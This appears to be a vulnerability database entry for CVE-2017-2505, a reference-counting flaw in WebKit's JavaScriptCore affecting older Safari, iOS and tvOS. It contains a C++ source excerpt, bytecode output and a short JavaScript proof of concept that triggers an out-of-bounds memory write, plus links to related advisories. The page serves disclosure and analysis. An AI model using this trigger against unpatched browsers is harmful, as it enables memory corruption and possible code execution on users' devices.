Lucene search
RootSSV:93145HistoryMay 26, 2017 - 12:00 a.m.
WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count(CVE-2017-2505)
2017-05-2600:00:00
Root
www.seebug.org
18
0.007 Low
EPSS
Percentile
77.3%
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the “WebKit” component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Here’s a snippet of BindingNode::bindValue.
void BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const
{
...
RegisterID* scope = generator.emitResolveScope(nullptr, var);
generator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd());
if (m_bindingContext == AssignmentContext::AssignmentExpression)
generator.emitTDZCheckIfNecessary(var, nullptr, scope);
if (isReadOnly) {
generator.emitReadOnlyExceptionIfNeeded(var);
return;
}
generator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext));
generator.emitProfileType(value, var, divotStart(), divotEnd());
if (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement)
generator.liftTDZCheckIfPossible(var);
...
}
That method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used.
Generated opcode of the PoC:
[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0
[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None
[ 139] op_check_tdz loc13
[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0
At 131, loc13 which points the scope is overwritten with |a|.
At 141, |a| is used as a scope, and it causes OOB write.
PoC:
(function () {
let a = {
get val() {
[...{a = 1.45}] = [];
a.val.x;
},
};
a.val;
})();
(function () {
let a = {
get val() {
[...{a = 1.45}] = [];
a.val.x;
},
};
a.val;
})();
Related
debiancve
debiancve
CVE-2017-2505
2017-05-22 05:29:00
checkpoint_advisories
checkpoint_advisories
Apple Webkit Remote Code Execution (CVE-2017-2505)
2020-02-27 00:00:00
ubuntucve
ubuntucve
CVE-2017-2505
2017-05-22 00:00:00
prion
prion
Memory corruption
2017-05-22 05:29:00
packetstorm
packetstorm
WebKit JSC BindingNode::bindValue Failed Reference Count Increase
2017-05-25 00:00:00
cve
cve
CVE-2017-2505
2017-05-22 05:29:00
myhack58
myhack58
googleprojectzero
googleprojectzero
JSC Exploits
2019-08-29 00:00:00
nessus
nessus
Apple TV < 10.2.1 Multiple Vulnerabilities
2017-05-17 00:00:00
macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities
2017-05-23 00:00:00
Apple iOS < 10.3.2 Multiple Vulnerabilities
2017-05-18 00:00:00
openvas
openvas
Apple Safari Multiple Vulnerabilities-HT207804
2017-05-16 00:00:00
apple
apple
About the security content of Safari 10.1.1 - Apple Support
2017-06-26 04:38:16
About the security content of Safari 10.1.1
2017-05-15 00:00:00
About the security content of tvOS 10.2.1
2017-05-15 00:00:00
gentoo
gentoo
WebKitGTK+: Multiple vulnerabilities
2017-06-07 00:00:00